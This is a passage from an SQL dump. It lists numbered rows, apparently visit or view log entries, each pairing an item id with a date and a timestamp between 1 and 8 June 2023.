08:00:34'),(77051,473,1,'2023-06-01','2023-06-01 08:00:47'),(77052,487,1,'2023-06-01','2023-06-01 08:00:51'),(77053,5304,1,'2023-06-01','2023-06-01 08:01:52'),(77054,5163,1,'2023-06-01','2023-06-01 09:55:44'),(77055,3004,1,'2023-06-01','2023-06-01 10:02:50'),(77056,1608,1,'2023-06-01','2023-06-01 10:11:03'),(77057,1608,1,'2023-06-01','2023-06-01 10:14:08'),(77058,5276,1,'2023-06-01','2023-06-01 10:47:55'),(77059,4911,1,'2023-06-01','2023-06-01 11:05:06'),(77060,1614,1,'2023-06-01','2023-06-01 11:06:32'),(77061,5276,1,'2023-06-01','2023-06-01 11:47:32'),(77062,2769,1,'2023-06-01','2023-06-01 12:08:51'),(77063,1722,1,'2023-06-01','2023-06-01 12:12:49'),(77064,1598,1,'2023-06-01','2023-06-01 12:15:45'),(77065,4542,1,'2023-06-01','2023-06-01 13:47:01'),(77066,4400,1,'2023-06-01','2023-06-01 14:07:30'),(77067,1606,1,'2023-06-01','2023-06-01 14:19:07'),(77068,2161,1,'2023-06-01','2023-06-01 15:08:01'),(77069,3714,1,'2023-06-01','2023-06-01 15:32:04'),(77070,89,1,'2023-06-01','2023-06-01 15:33:26'),(77071,1718,1,'2023-06-01','2023-06-01 15:44:36'),(77072,2769,1,'2023-06-01','2023-06-01 15:57:14'),(77073,4911,1,'2023-06-01','2023-06-01 16:12:17'),(77074,4944,1,'2023-06-01','2023-06-01 16:21:26'),(77075,4963,1,'2023-06-01','2023-06-01 16:32:43'),(77076,68,1,'2023-06-01','2023-06-01 16:33:05'),(77077,4963,1,'2023-06-01','2023-06-01 16:33:30'),(77078,4888,1,'2023-06-01','2023-06-01 16:39:10'),(77079,5276,1,'2023-06-01','2023-06-01 16:44:33'),(77080,80,1,'2023-06-01','2023-06-01 18:34:37'),(77081,80,1,'2023-06-01','2023-06-01 18:34:50'),(77082,5071,1,'2023-06-01','2023-06-01 18:55:21'),(77083,91,1,'2023-06-01','2023-06-01 18:56:54'),(77084,4420,1,'2023-06-01','2023-06-01 19:19:19'),(77085,3781,1,'2023-06-01','2023-06-01 20:06:23'),(77086,2419,1,'2023-06-01','2023-06-01 20:28:29'),(77087,470,1,'2023-06-01','2023-06-01 20:39:14'),(77088,470,1,'2023-06-01','2023-06-01 20:39:34'),(77089,4416,1,'2023-06-01','2023-06-01 21:41:21'),(77090,474,1,'2023-06-01','2023-06-01 21:58:37'),(77091,4938,1,'2023-06-02','2023-06-02 00:07:58'),(77092,5067,1,'2023-06-02','2023-06-02 00:35:39'),(77093,5125,1,'2023-06-02','2023-06-02 01:08:15'),(77094,5125,1,'2023-06-02','2023-06-02 01:08:18'),(77095,4944,1,'2023-06-02','2023-06-02 01:12:29'),(77096,4944,1,'2023-06-02','2023-06-02 01:13:53'),(77097,1711,1,'2023-06-02','2023-06-02 01:26:15'),(77098,2989,1,'2023-06-02','2023-06-02 01:32:41'),(77099,2503,1,'2023-06-02','2023-06-02 02:29:50'),(77100,5122,1,'2023-06-02','2023-06-02 03:08:57'),(77101,5122,1,'2023-06-02','2023-06-02 03:08:58'),(77102,3764,1,'2023-06-02','2023-06-02 03:08:59'),(77103,5128,1,'2023-06-02','2023-06-02 03:20:20'),(77104,5128,1,'2023-06-02','2023-06-02 03:20:24'),(77105,5137,1,'2023-06-02','2023-06-02 03:31:44'),(77106,5137,1,'2023-06-02','2023-06-02 03:31:46'),(77107,469,1,'2023-06-02','2023-06-02 03:42:56'),(77108,5134,1,'2023-06-02','2023-06-02 03:43:08'),(77109,5134,1,'2023-06-02','2023-06-02 03:43:09'),(77110,5131,1,'2023-06-02','2023-06-02 03:54:32'),(77111,5131,1,'2023-06-02','2023-06-02 03:54:33'),(77112,5268,1,'2023-06-02','2023-06-02 04:05:56'),(77113,5268,1,'2023-06-02','2023-06-02 04:05:57'),(77114,5317,1,'2023-06-02','2023-06-02 04:17:20'),(77115,5317,1,'2023-06-02','2023-06-02 04:17:22'),(77116,1598,1,'2023-06-02','2023-06-02 04:27:55'),(77117,470,1,'2023-06-02','2023-06-02 04:40:09'),(77118,470,1,'2023-06-02','2023-06-02 04:40:10'),(77119,87,1,'2023-06-02','2023-06-02 05:04:32'),(77120,5314,1,'2023-06-02','2023-06-02 05:25:08'),(77121,5314,1,'2023-06-02','2023-06-02 05:25:10'),(77122,3038,1,'2023-06-02','2023-06-02 05:35:27'),(77123,2809,1,'2023-06-02','2023-06-02 05:42:26'),(77124,1722,1,'2023-06-02','2023-06-02 05:42:28'),(77125,5320,1,'2023-06-02','2023-06-02 06:10:08'),(77126,5320,1,'2023-06-02','2023-06-02 06:10:10'),(77127,4301,1,'2023-06-02','2023-06-02 06:20:28'),(77128,473,1,'2023-06-02','2023-06-02 07:05:26'),(77129,5304,1,'2023-06-02','2023-06-02 07:16:13'),(77130,4911,1,'2023-06-02','2023-06-02 08:58:30'),(77131,4911,1,'2023-06-02','2023-06-02 08:58:43'),(77132,80,1,'2023-06-02','2023-06-02 09:06:34'),(77133,1582,1,'2023-06-02','2023-06-02 10:05:30'),(77134,5163,1,'2023-06-02','2023-06-02 11:12:39'),(77135,4870,1,'2023-06-02','2023-06-02 11:23:36'),(77136,3534,1,'2023-06-02','2023-06-02 11:29:53'),(77137,4977,1,'2023-06-02','2023-06-02 11:31:23'),(77138,1614,1,'2023-06-02','2023-06-02 11:41:50'),(77139,4977,1,'2023-06-02','2023-06-02 11:42:58'),(77140,4980,1,'2023-06-02','2023-06-02 11:43:44'),(77141,4238,1,'2023-06-02','2023-06-02 11:43:54'),(77142,5163,1,'2023-06-02','2023-06-02 12:02:57'),(77143,472,1,'2023-06-02','2023-06-02 12:03:53'),(77144,91,1,'2023-06-02','2023-06-02 12:03:55'),(77145,4944,1,'2023-06-02','2023-06-02 12:04:47'),(77146,472,1,'2023-06-02','2023-06-02 12:31:32'),(77147,472,1,'2023-06-02','2023-06-02 12:35:44'),(77148,4870,1,'2023-06-02','2023-06-02 12:46:09'),(77149,3664,1,'2023-06-02','2023-06-02 13:17:04'),(77150,4542,1,'2023-06-02','2023-06-02 14:01:40'),(77151,1586,1,'2023-06-02','2023-06-02 14:17:12'),(77152,1582,1,'2023-06-02','2023-06-02 14:21:09'),(77153,4747,1,'2023-06-02','2023-06-02 14:32:45'),(77154,91,1,'2023-06-02','2023-06-02 15:21:24'),(77155,4983,1,'2023-06-02','2023-06-02 15:33:17'),(77156,4608,1,'2023-06-02','2023-06-02 16:30:00'),(77157,4674,1,'2023-06-02','2023-06-02 16:55:15'),(77158,4608,1,'2023-06-02','2023-06-02 16:55:37'),(77159,4608,1,'2023-06-02','2023-06-02 17:02:05'),(77160,4977,1,'2023-06-02','2023-06-02 17:32:19'),(77161,3664,1,'2023-06-02','2023-06-02 17:43:59'),(77162,3781,1,'2023-06-02','2023-06-02 19:29:36'),(77163,68,1,'2023-06-02','2023-06-02 19:46:42'),(77164,1612,1,'2023-06-02','2023-06-02 20:00:39'),(77165,1586,1,'2023-06-02','2023-06-02 20:31:44'),(77166,4911,1,'2023-06-02','2023-06-02 20:45:32'),(77167,4911,1,'2023-06-02','2023-06-02 20:45:34'),(77168,2309,1,'2023-06-02','2023-06-02 21:03:02'),(77169,1586,1,'2023-06-02','2023-06-02 21:49:46'),(77170,5163,1,'2023-06-02','2023-06-02 21:49:47'),(77171,4420,1,'2023-06-02','2023-06-02 22:18:41'),(77172,4542,1,'2023-06-02','2023-06-02 23:34:50'),(77173,3240,1,'2023-06-03','2023-06-03 00:04:46'),(77174,472,1,'2023-06-03','2023-06-03 02:16:13'),(77175,4753,1,'2023-06-03','2023-06-03 02:31:07'),(77176,4542,1,'2023-06-03','2023-06-03 02:47:22'),(77177,4750,1,'2023-06-03','2023-06-03 03:17:02'),(77178,68,1,'2023-06-03','2023-06-03 04:11:06'),(77179,2748,1,'2023-06-03','2023-06-03 04:28:41'),(77180,1608,1,'2023-06-03','2023-06-03 05:43:21'),(77181,5292,1,'2023-06-03','2023-06-03 05:51:40'),(77182,468,1,'2023-06-03','2023-06-03 06:33:18'),(77183,3038,1,'2023-06-03','2023-06-03 06:34:01'),(77184,4768,1,'2023-06-03','2023-06-03 06:42:13'),(77185,468,1,'2023-06-03','2023-06-03 07:55:58'),(77186,3038,1,'2023-06-03','2023-06-03 08:01:55'),(77187,2161,1,'2023-06-03','2023-06-03 08:16:36'),(77188,3038,1,'2023-06-03','2023-06-03 08:24:27'),(77189,3788,1,'2023-06-03','2023-06-03 08:24:30'),(77190,3691,1,'2023-06-03','2023-06-03 08:37:25'),(77191,1720,1,'2023-06-03','2023-06-03 08:38:31'),(77192,3746,1,'2023-06-03','2023-06-03 08:46:55'),(77193,1596,1,'2023-06-03','2023-06-03 09:04:06'),(77194,3746,1,'2023-06-03','2023-06-03 09:16:57'),(77195,5256,1,'2023-06-03','2023-06-03 09:25:57'),(77196,4561,1,'2023-06-03','2023-06-03 09:32:27'),(77197,4608,1,'2023-06-03','2023-06-03 10:12:04'),(77198,1711,1,'2023-06-03','2023-06-03 10:40:49'),(77199,3691,1,'2023-06-03','2023-06-03 10:49:59'),(77200,3764,1,'2023-06-03','2023-06-03 11:21:01'),(77201,1596,1,'2023-06-03','2023-06-03 11:30:55'),(77202,3664,1,'2023-06-03','2023-06-03 11:50:00'),(77203,5323,1,'2023-06-03','2023-06-03 11:56:55'),(77204,2748,1,'2023-06-03','2023-06-03 12:16:59'),(77205,4556,1,'2023-06-03','2023-06-03 12:36:33'),(77206,4976,1,'2023-06-03','2023-06-03 12:41:58'),(77207,4960,1,'2023-06-03','2023-06-03 13:11:42'),(77208,4753,1,'2023-06-03','2023-06-03 13:26:58'),(77209,4753,1,'2023-06-03','2023-06-03 13:27:00'),(77210,4977,1,'2023-06-03','2023-06-03 13:49:28'),(77211,4977,1,'2023-06-03','2023-06-03 13:55:24'),(77212,3079,1,'2023-06-03','2023-06-03 14:04:02'),(77213,4983,1,'2023-06-03','2023-06-03 14:11:58'),(77214,4983,1,'2023-06-03','2023-06-03 14:12:51'),(77215,474,1,'2023-06-03','2023-06-03 14:34:34'),(77216,474,1,'2023-06-03','2023-06-03 14:34:35'),(77217,3269,1,'2023-06-03','2023-06-03 15:18:31'),(77218,3781,1,'2023-06-03','2023-06-03 15:20:15'),(77219,470,1,'2023-06-03','2023-06-03 15:41:59'),(77220,570,1,'2023-06-03','2023-06-03 16:22:57'),(77221,1594,1,'2023-06-03','2023-06-03 16:25:39'),(77222,2751,1,'2023-06-03','2023-06-03 16:51:24'),(77223,2904,1,'2023-06-03','2023-06-03 17:27:57'),(77224,4874,1,'2023-06-03','2023-06-03 17:28:06'),(77225,4911,1,'2023-06-03','2023-06-03 17:30:11'),(77226,4911,1,'2023-06-03','2023-06-03 17:31:05'),(77227,4911,1,'2023-06-03','2023-06-03 17:42:50'),(77228,5128,1,'2023-06-03','2023-06-03 17:49:50'),(77229,3746,1,'2023-06-03','2023-06-03 18:19:59'),(77230,4911,1,'2023-06-03','2023-06-03 18:34:55'),(77231,4520,1,'2023-06-03','2023-06-03 19:17:04'),(77232,1604,1,'2023-06-03','2023-06-03 19:24:55'),(77233,570,1,'2023-06-03','2023-06-03 19:54:22'),(77234,3006,1,'2023-06-03','2023-06-03 20:08:08'),(77235,4576,1,'2023-06-03','2023-06-03 20:22:28'),(77236,5280,1,'2023-06-03','2023-06-03 20:32:56'),(77237,3034,1,'2023-06-03','2023-06-03 21:05:32'),(77238,3004,1,'2023-06-03','2023-06-03 21:44:46'),(77239,1592,1,'2023-06-03','2023-06-03 21:59:33'),(77240,4963,1,'2023-06-03','2023-06-03 22:40:20'),(77241,3006,1,'2023-06-03','2023-06-03 23:22:07'),(77242,1612,1,'2023-06-04','2023-06-04 01:57:22'),(77243,1592,1,'2023-06-04','2023-06-04 02:30:47'),(77244,5334,1,'2023-06-04','2023-06-04 02:42:22'),(77245,4238,1,'2023-06-04','2023-06-04 04:21:37'),(77246,5122,1,'2023-06-04','2023-06-04 04:23:32'),(77247,89,1,'2023-06-04','2023-06-04 06:23:39'),(77248,4703,1,'2023-06-04','2023-06-04 06:29:38'),(77249,2991,1,'2023-06-04','2023-06-04 06:53:39'),(77250,4977,1,'2023-06-04','2023-06-04 07:08:36'),(77251,4966,1,'2023-06-04','2023-06-04 07:42:06'),(77252,76,1,'2023-06-04','2023-06-04 07:50:55'),(77253,91,1,'2023-06-04','2023-06-04 10:38:51'),(77254,4938,1,'2023-06-04','2023-06-04 11:24:00'),(77255,4938,1,'2023-06-04','2023-06-04 11:43:54'),(77256,2148,1,'2023-06-04','2023-06-04 12:21:56'),(77257,1596,1,'2023-06-04','2023-06-04 12:26:04'),(77258,4911,1,'2023-06-04','2023-06-04 13:39:57'),(77259,3102,1,'2023-06-04','2023-06-04 14:53:11'),(77260,1602,1,'2023-06-04','2023-06-04 15:00:20'),(77261,4893,1,'2023-06-04','2023-06-04 15:32:23'),(77262,2558,1,'2023-06-04','2023-06-04 15:38:04'),(77263,477,1,'2023-06-04','2023-06-04 15:40:58'),(77264,4938,1,'2023-06-04','2023-06-04 16:01:02'),(77265,2148,1,'2023-06-04','2023-06-04 16:07:22'),(77266,1602,1,'2023-06-04','2023-06-04 16:24:11'),(77267,3777,1,'2023-06-04','2023-06-04 16:28:36'),(77268,3269,1,'2023-06-04','2023-06-04 19:00:04'),(77269,472,1,'2023-06-04','2023-06-04 19:10:26'),(77270,1766,1,'2023-06-04','2023-06-04 19:51:06'),(77271,2964,1,'2023-06-04','2023-06-04 20:18:55'),(77272,1544,1,'2023-06-04','2023-06-04 20:46:02'),(77273,1596,1,'2023-06-04','2023-06-04 20:52:00'),(77274,470,1,'2023-06-04','2023-06-04 20:54:03'),(77275,4911,1,'2023-06-04','2023-06-04 21:35:01'),(77276,4706,1,'2023-06-04','2023-06-04 21:36:03'),(77277,4930,1,'2023-06-04','2023-06-04 21:36:04'),(77278,76,1,'2023-06-04','2023-06-04 21:36:55'),(77279,4341,1,'2023-06-04','2023-06-04 21:49:00'),(77280,4691,1,'2023-06-04','2023-06-04 22:21:04'),(77281,3253,1,'2023-06-04','2023-06-04 23:06:27'),(77282,68,1,'2023-06-04','2023-06-04 23:15:54'),(77283,1600,1,'2023-06-04','2023-06-04 23:42:19'),(77284,4412,1,'2023-06-05','2023-06-05 01:12:06'),(77285,3680,1,'2023-06-05','2023-06-05 01:49:13'),(77286,5076,1,'2023-06-05','2023-06-05 01:57:57'),(77287,2609,1,'2023-06-05','2023-06-05 02:00:03'),(77288,76,1,'2023-06-05','2023-06-05 02:06:45'),(77289,1612,1,'2023-06-05','2023-06-05 02:42:08'),(77290,472,1,'2023-06-05','2023-06-05 03:19:53'),(77291,474,1,'2023-06-05','2023-06-05 04:46:49'),(77292,3680,1,'2023-06-05','2023-06-05 05:41:16'),(77293,4759,1,'2023-06-05','2023-06-05 06:09:28'),(77294,1711,1,'2023-06-05','2023-06-05 07:23:51'),(77295,1608,1,'2023-06-05','2023-06-05 07:25:08'),(77296,5280,1,'2023-06-05','2023-06-05 08:00:33'),(77297,108,1,'2023-06-05','2023-06-05 08:09:38'),(77298,487,1,'2023-06-05','2023-06-05 08:14:47'),(77299,473,1,'2023-06-05','2023-06-05 08:14:50'),(77300,4966,1,'2023-06-05','2023-06-05 08:24:06'),(77301,4457,1,'2023-06-05','2023-06-05 08:28:59'),(77302,76,1,'2023-06-05','2023-06-05 09:36:53'),(77303,1596,1,'2023-06-05','2023-06-05 10:10:33'),(77304,4911,1,'2023-06-05','2023-06-05 10:21:07'),(77305,4762,1,'2023-06-05','2023-06-05 10:37:10'),(77306,3079,1,'2023-06-05','2023-06-05 11:07:26'),(77307,4612,1,'2023-06-05','2023-06-05 11:24:51'),(77308,4700,1,'2023-06-05','2023-06-05 12:02:53'),(77309,470,1,'2023-06-05','2023-06-05 12:03:26'),(77310,4911,1,'2023-06-05','2023-06-05 12:20:27'),(77311,5062,1,'2023-06-05','2023-06-05 12:27:09'),(77312,1602,1,'2023-06-05','2023-06-05 12:59:21'),(77313,4542,1,'2023-06-05','2023-06-05 13:19:59'),(77314,4966,1,'2023-06-05','2023-06-05 13:45:12'),(77315,4966,1,'2023-06-05','2023-06-05 13:48:06'),(77316,3313,1,'2023-06-05','2023-06-05 13:49:01'),(77317,2159,1,'2023-06-05','2023-06-05 14:00:33'),(77318,2309,1,'2023-06-05','2023-06-05 14:14:17'),(77319,1602,1,'2023-06-05','2023-06-05 14:20:16'),(77320,1600,1,'2023-06-05','2023-06-05 14:47:39'),(77321,4489,1,'2023-06-05','2023-06-05 14:58:02'),(77322,4612,1,'2023-06-05','2023-06-05 15:48:28'),(77323,2704,1,'2023-06-05','2023-06-05 16:01:00'),(77324,2503,1,'2023-06-05','2023-06-05 17:19:53'),(77325,91,1,'2023-06-05','2023-06-05 17:20:09'),(77326,76,1,'2023-06-05','2023-06-05 17:21:07'),(77327,84,1,'2023-06-05','2023-06-05 17:21:15'),(77328,3005,1,'2023-06-05','2023-06-05 17:23:18'),(77329,4323,1,'2023-06-05','2023-06-05 17:34:42'),(77330,2748,1,'2023-06-05','2023-06-05 17:41:54'),(77331,5271,1,'2023-06-05','2023-06-05 17:49:10'),(77332,91,1,'2023-06-05','2023-06-05 18:09:13'),(77333,4980,1,'2023-06-05','2023-06-05 18:14:21'),(77334,4911,1,'2023-06-05','2023-06-05 18:19:25'),(77335,1602,1,'2023-06-05','2023-06-05 19:08:36'),(77336,4963,1,'2023-06-05','2023-06-05 19:26:20'),(77337,4440,1,'2023-06-05','2023-06-05 19:31:19'),(77338,4489,1,'2023-06-05','2023-06-05 19:44:23'),(77339,3030,1,'2023-06-05','2023-06-05 21:11:32'),(77340,4637,1,'2023-06-05','2023-06-05 21:14:32'),(77341,91,1,'2023-06-05','2023-06-05 21:59:33'),(77342,2904,1,'2023-06-05','2023-06-05 22:52:59'),(77343,91,1,'2023-06-05','2023-06-05 23:03:20'),(77344,91,1,'2023-06-05','2023-06-05 23:13:17'),(77345,91,1,'2023-06-05','2023-06-05 23:28:49'),(77346,4960,1,'2023-06-06','2023-06-06 00:17:00'),(77347,4960,1,'2023-06-06','2023-06-06 00:17:08'),(77348,4412,1,'2023-06-06','2023-06-06 01:07:57'),(77349,4391,1,'2023-06-06','2023-06-06 01:11:40'),(77350,5054,1,'2023-06-06','2023-06-06 01:18:50'),(77351,4391,1,'2023-06-06','2023-06-06 01:33:30'),(77352,4709,1,'2023-06-06','2023-06-06 01:37:04'),(77353,4911,1,'2023-06-06','2023-06-06 01:55:53'),(77354,4709,1,'2023-06-06','2023-06-06 01:59:29'),(77355,3104,1,'2023-06-06','2023-06-06 02:58:17'),(77356,4960,1,'2023-06-06','2023-06-06 03:06:54'),(77357,4747,1,'2023-06-06','2023-06-06 03:10:13'),(77358,76,1,'2023-06-06','2023-06-06 03:14:50'),(77359,4988,1,'2023-06-06','2023-06-06 03:50:17'),(77360,4338,1,'2023-06-06','2023-06-06 04:04:54'),(77361,2178,1,'2023-06-06','2023-06-06 04:14:26'),(77362,473,1,'2023-06-06','2023-06-06 04:23:58'),(77363,5163,1,'2023-06-06','2023-06-06 04:35:53'),(77364,3023,1,'2023-06-06','2023-06-06 05:10:11'),(77365,3027,1,'2023-06-06','2023-06-06 05:10:11'),(77366,5054,1,'2023-06-06','2023-06-06 06:02:00'),(77367,1602,1,'2023-06-06','2023-06-06 06:17:00'),(77368,91,1,'2023-06-06','2023-06-06 06:39:15'),(77369,4938,1,'2023-06-06','2023-06-06 06:54:02'),(77370,3271,1,'2023-06-06','2023-06-06 07:01:54'),(77371,1602,1,'2023-06-06','2023-06-06 07:28:46'),(77372,1728,1,'2023-06-06','2023-06-06 07:54:51'),(77373,1728,1,'2023-06-06','2023-06-06 07:57:51'),(77374,108,1,'2023-06-06','2023-06-06 08:31:55'),(77375,335,1,'2023-06-06','2023-06-06 09:07:02'),(77376,1594,1,'2023-06-06','2023-06-06 10:09:36'),(77377,5163,1,'2023-06-06','2023-06-06 10:19:24'),(77378,4709,1,'2023-06-06','2023-06-06 10:24:46'),(77379,570,1,'2023-06-06','2023-06-06 10:45:27'),(77380,3060,1,'2023-06-06','2023-06-06 12:36:05'),(77381,4408,1,'2023-06-06','2023-06-06 13:13:29'),(77382,68,1,'2023-06-06','2023-06-06 13:27:11'),(77383,4930,1,'2023-06-06','2023-06-06 13:37:12'),(77384,4862,1,'2023-06-06','2023-06-06 13:48:49'),(77385,470,1,'2023-06-06','2023-06-06 14:14:27'),(77386,1586,1,'2023-06-06','2023-06-06 14:34:57'),(77387,2410,1,'2023-06-06','2023-06-06 14:38:44'),(77388,470,1,'2023-06-06','2023-06-06 14:39:55'),(77389,2904,1,'2023-06-06','2023-06-06 14:41:02'),(77390,2904,1,'2023-06-06','2023-06-06 14:41:43'),(77391,2904,1,'2023-06-06','2023-06-06 14:41:49'),(77392,2904,1,'2023-06-06','2023-06-06 14:41:53'),(77393,102,1,'2023-06-06','2023-06-06 14:42:11'),(77394,1594,1,'2023-06-06','2023-06-06 15:00:00'),(77395,3764,1,'2023-06-06','2023-06-06 15:10:47'),(77396,5253,1,'2023-06-06','2023-06-06 15:36:52'),(77397,2609,1,'2023-06-06','2023-06-06 16:01:52'),(77398,87,1,'2023-06-06','2023-06-06 16:02:54'),(77399,486,1,'2023-06-06','2023-06-06 16:03:28'),(77400,87,1,'2023-06-06','2023-06-06 16:03:39'),(77401,1877,1,'2023-06-06','2023-06-06 16:04:10'),(77402,1872,1,'2023-06-06','2023-06-06 16:05:00'),(77403,2178,1,'2023-06-06','2023-06-06 16:07:13'),(77404,1544,1,'2023-06-06','2023-06-06 16:08:53'),(77405,1544,1,'2023-06-06','2023-06-06 16:09:34'),(77406,5157,1,'2023-06-06','2023-06-06 16:09:56'),(77407,68,1,'2023-06-06','2023-06-06 16:10:43'),(77408,2178,1,'2023-06-06','2023-06-06 16:39:56'),(77409,91,1,'2023-06-06','2023-06-06 16:58:18'),(77410,473,1,'2023-06-06','2023-06-06 16:59:37'),(77411,1877,1,'2023-06-06','2023-06-06 16:59:41'),(77412,1870,1,'2023-06-06','2023-06-06 17:02:23'),(77413,473,1,'2023-06-06','2023-06-06 17:02:23'),(77414,1872,1,'2023-06-06','2023-06-06 17:03:14'),(77415,473,1,'2023-06-06','2023-06-06 17:03:14'),(77416,3541,1,'2023-06-06','2023-06-06 17:10:35'),(77417,3251,1,'2023-06-06','2023-06-06 17:53:20'),(77418,3486,1,'2023-06-06','2023-06-06 18:02:25'),(77419,4960,1,'2023-06-06','2023-06-06 18:16:05'),(77420,4960,1,'2023-06-06','2023-06-06 18:16:14'),(77421,3251,1,'2023-06-06','2023-06-06 20:14:11'),(77422,3251,1,'2023-06-06','2023-06-06 20:14:29'),(77423,3251,1,'2023-06-06','2023-06-06 20:16:30'),(77424,5062,1,'2023-06-06','2023-06-06 20:46:09'),(77425,3004,1,'2023-06-06','2023-06-06 21:29:19'),(77426,2904,1,'2023-06-06','2023-06-06 21:34:04'),(77427,2904,1,'2023-06-06','2023-06-06 21:34:55'),(77428,2904,1,'2023-06-06','2023-06-06 21:36:19'),(77429,3004,1,'2023-06-06','2023-06-06 21:36:20'),(77430,3004,1,'2023-06-06','2023-06-06 21:36:32'),(77431,3127,1,'2023-06-06','2023-06-06 21:54:23'),(77432,3127,1,'2023-06-06','2023-06-06 22:39:19'),(77433,4436,1,'2023-06-06','2023-06-06 22:59:51'),(77434,3127,1,'2023-06-06','2023-06-06 23:01:48'),(77435,4963,1,'2023-06-06','2023-06-06 23:27:58'),(77436,468,1,'2023-06-07','2023-06-07 00:09:40'),(77437,2309,1,'2023-06-07','2023-06-07 00:51:24'),(77438,3698,1,'2023-06-07','2023-06-07 00:57:30'),(77439,4944,1,'2023-06-07','2023-06-07 01:20:11'),(77440,4840,1,'2023-06-07','2023-06-07 01:58:37'),(77441,89,1,'2023-06-07','2023-06-07 02:00:06'),(77442,1608,1,'2023-06-07','2023-06-07 02:33:47'),(77443,5050,1,'2023-06-07','2023-06-07 03:15:23'),(77444,3486,1,'2023-06-07','2023-06-07 03:25:18'),(77445,4520,1,'2023-06-07','2023-06-07 04:37:56'),(77446,3127,1,'2023-06-07','2023-06-07 05:02:16'),(77447,91,1,'2023-06-07','2023-06-07 06:09:39'),(77448,4862,1,'2023-06-07','2023-06-07 06:18:05'),(77449,1544,1,'2023-06-07','2023-06-07 06:41:21'),(77450,1602,1,'2023-06-07','2023-06-07 07:24:02'),(77451,2152,1,'2023-06-07','2023-06-07 07:28:54'),(77452,91,1,'2023-06-07','2023-06-07 09:14:15'),(77453,5050,1,'2023-06-07','2023-06-07 09:16:36'),(77454,4944,1,'2023-06-07','2023-06-07 09:42:27'),(77455,76,1,'2023-06-07','2023-06-07 10:44:09'),(77456,3764,1,'2023-06-07','2023-06-07 10:50:26'),(77457,1728,1,'2023-06-07','2023-06-07 10:54:28'),(77458,1728,1,'2023-06-07','2023-06-07 10:57:28'),(77459,4363,1,'2023-06-07','2023-06-07 11:04:08'),(77460,4363,1,'2023-06-07','2023-06-07 11:05:21'),(77461,76,1,'2023-06-07','2023-06-07 11:18:41'),(77462,1602,1,'2023-06-07','2023-06-07 11:34:21'),(77463,1588,1,'2023-06-07','2023-06-07 11:45:31'),(77464,4520,1,'2023-06-07','2023-06-07 11:46:54'),(77465,1590,1,'2023-06-07','2023-06-07 11:47:30'),(77466,1588,1,'2023-06-07','2023-06-07 11:48:15'),(77467,1596,1,'2023-06-07','2023-06-07 11:48:51'),(77468,4338,1,'2023-06-07','2023-06-07 12:01:35'),(77469,4911,1,'2023-06-07','2023-06-07 12:02:27'),(77470,3226,1,'2023-06-07','2023-06-07 12:17:55'),(77471,3226,1,'2023-06-07','2023-06-07 12:20:31'),(77472,1588,1,'2023-06-07','2023-06-07 12:25:57'),(77473,91,1,'2023-06-07','2023-06-07 12:45:14'),(77474,5067,1,'2023-06-07','2023-06-07 12:56:18'),(77475,4911,1,'2023-06-07','2023-06-07 13:02:11'),(77476,4750,1,'2023-06-07','2023-06-07 13:43:42'),(77477,3313,1,'2023-06-07','2023-06-07 14:23:02'),(77478,3764,1,'2023-06-07','2023-06-07 14:27:15'),(77479,472,1,'2023-06-07','2023-06-07 14:31:12'),(77480,5122,1,'2023-06-07','2023-06-07 14:40:16'),(77481,3764,1,'2023-06-07','2023-06-07 14:47:30'),(77482,487,1,'2023-06-07','2023-06-07 14:48:00'),(77483,473,1,'2023-06-07','2023-06-07 14:48:00'),(77484,3023,1,'2023-06-07','2023-06-07 14:49:29'),(77485,472,1,'2023-06-07','2023-06-07 14:57:34'),(77486,1604,1,'2023-06-07','2023-06-07 15:18:50'),(77487,472,1,'2023-06-07','2023-06-07 15:27:13'),(77488,4238,1,'2023-06-07','2023-06-07 15:39:24'),(77489,5163,1,'2023-06-07','2023-06-07 15:50:05'),(77490,80,1,'2023-06-07','2023-06-07 15:50:42'),(77491,1588,1,'2023-06-07','2023-06-07 16:22:03'),(77492,4335,1,'2023-06-07','2023-06-07 16:26:11'),(77493,4963,1,'2023-06-07','2023-06-07 16:37:56'),(77494,1582,1,'2023-06-07','2023-06-07 16:41:03'),(77495,91,1,'2023-06-07','2023-06-07 17:09:45'),(77496,5304,1,'2023-06-07','2023-06-07 17:27:45'),(77497,4709,1,'2023-06-07','2023-06-07 17:37:30'),(77498,4524,1,'2023-06-07','2023-06-07 18:25:52'),(77499,4911,1,'2023-06-07','2023-06-07 19:03:39'),(77500,4911,1,'2023-06-07','2023-06-07 19:09:15'),(77501,1602,1,'2023-06-07','2023-06-07 19:55:45'),(77502,1594,1,'2023-06-07','2023-06-07 20:24:28'),(77503,76,1,'2023-06-07','2023-06-07 20:24:40'),(77504,1594,1,'2023-06-07','2023-06-07 20:25:20'),(77505,1602,1,'2023-06-07','2023-06-07 20:28:45'),(77506,4963,1,'2023-06-07','2023-06-07 20:40:28'),(77507,478,1,'2023-06-07','2023-06-07 20:49:21'),(77508,478,1,'2023-06-07','2023-06-07 20:49:46'),(77509,4988,1,'2023-06-07','2023-06-07 20:54:53'),(77510,4988,1,'2023-06-07','2023-06-07 20:54:54'),(77511,4911,1,'2023-06-07','2023-06-07 21:13:08'),(77512,1602,1,'2023-06-07','2023-06-07 21:13:35'),(77513,570,1,'2023-06-07','2023-06-07 21:49:39'),(77514,2964,1,'2023-06-07','2023-06-07 21:56:16'),(77515,4768,1,'2023-06-07','2023-06-07 21:56:50'),(77516,4768,1,'2023-06-07','2023-06-07 21:56:52'),(77517,487,1,'2023-06-07','2023-06-07 22:11:49'),(77518,487,1,'2023-06-07','2023-06-07 22:12:42'),(77519,1747,1,'2023-06-07','2023-06-07 22:22:56'),(77520,4980,1,'2023-06-07','2023-06-07 22:26:48'),(77521,4980,1,'2023-06-07','2023-06-07 22:26:52'),(77522,4759,1,'2023-06-07','2023-06-07 22:49:54'),(77523,4759,1,'2023-06-07','2023-06-07 22:49:55'),(77524,3090,1,'2023-06-07','2023-06-07 22:52:57'),(77525,4524,1,'2023-06-07','2023-06-07 22:56:23'),(77526,1600,1,'2023-06-07','2023-06-07 22:58:48'),(77527,468,1,'2023-06-07','2023-06-07 23:00:55'),(77528,468,1,'2023-06-07','2023-06-07 23:00:56'),(77529,1870,1,'2023-06-07','2023-06-07 23:18:49'),(77530,1870,1,'2023-06-07','2023-06-07 23:18:51'),(77531,3752,1,'2023-06-07','2023-06-07 23:32:01'),(77532,5271,1,'2023-06-07','2023-06-07 23:36:50'),(77533,5271,1,'2023-06-07','2023-06-07 23:36:51'),(77534,5080,1,'2023-06-07','2023-06-07 23:49:01'),(77535,473,1,'2023-06-07','2023-06-07 23:54:51'),(77536,473,1,'2023-06-07','2023-06-07 23:54:52'),(77537,4750,1,'2023-06-08','2023-06-08 